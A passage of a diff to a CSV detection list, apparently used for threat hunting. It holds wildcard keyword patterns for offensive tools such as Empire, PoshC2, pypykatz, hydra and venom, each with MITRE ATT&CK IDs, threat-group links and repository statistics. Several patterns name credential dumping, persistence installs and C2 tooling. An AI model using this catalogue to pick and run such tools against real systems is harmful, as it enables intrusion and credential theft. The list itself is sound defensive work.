Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*install gobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" "*install h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" -"*install hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3967","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" -"*install hping3*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" -"*install hydra-gtk*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*install hakrawler*","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","3971","458","2023-07-22T19:39:11Z","2019-12-15T13:54:43Z" +"*install hping3*","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*install hydra-gtk*","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" "*install impacket*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*install Jira-Lens*","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","0","N/A","N/A","3","206","31","2022-08-23T09:57:52Z","2021-11-14T18:37:47Z" "*install macchanger*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","0","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" @@ -11726,13 +11879,13 @@ "*install pivotnacci*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*install proxychains*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" "*install pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*install s3scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2221","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" +"*install s3scanner*","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","8","10","2222","366","2023-10-02T13:25:28Z","2017-06-19T22:14:21Z" "*install samdump2*","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","10","6","N/A","N/A","N/A","N/A" -"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*install smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" "*install tor deb.torproject.org-keyring*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*install udmp_parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" -"*install wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*install wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*install_aclpwn*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*install_ad_apt_tools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*install_adidnsdump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -11802,33 +11955,33 @@ "*install_winrar_wine32.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*install_winrar_wine64.*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*install_zerologon*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*installexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Install-Module ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*install-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*install-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Install-ServiceBinary*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Install-SSP -Path*.dll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Install-SSP.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Install-SSP.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*interactsh -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C10","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*interactsh*.exe","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C9","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*interactsh*oast.*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C14","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*interactsh-client -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C11","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*interactsh-server -*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C13","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","0","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*installexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Install-Module ps2exe*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*install-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*install-persistence-cron*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Install-ServiceBinary*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Install-SSP -Path*.dll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Install-SSP.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Install-SSP.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1116","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 